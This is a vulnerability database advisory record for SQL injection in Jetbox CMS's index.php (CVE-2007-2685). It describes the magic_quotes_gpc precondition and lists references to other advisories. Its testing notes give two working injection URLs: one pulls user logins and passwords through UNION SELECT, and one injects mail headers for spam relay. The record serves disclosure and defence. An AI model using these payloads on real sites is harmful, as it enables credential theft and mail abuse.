Jetbox CMS index.php Multiple Variable SQL Injection

2007-05-21T00:00:00
ID OSVDB:34784
Type osvdb
Reporter OSVDB
Modified 2007-05-21T00:00:00

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.

Manual Testing Notes

http://[target]/[PRODUCT-DIRECTORY]/index.php?view=-1' UNION SELECT 1,CONCAT(login,'-',user_password),1,1,1,1,1,1,1,1,1,1 FROM User LIMIT 0,1%23

http://[target]/[JETBOX-DIRECTORY]/index.php?view=webuser&task=sendpw&login=-1' UNION SELECT 1,1,1,'spam1mail.com%0ABcc: spam_address2@somedomain.com, spam_address2@somedomain.com, spam_address4@somedomain.com, spam_addressNsome@domain.com%0ASubject: Some Spam Subject%0AFrom: any_addresssome@domain.com%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A--Hacker%0ASome Spam Message%0A%0AContent-Type:text/ html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker- -%0AOther text will be hide',1 FROM user %23

References:

Other Advisory URL: http://www.netvigilance.com/advisory0028 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0349.html ISS X-Force ID: 34387 CVE-2007-2685 Bugtraq ID: 24077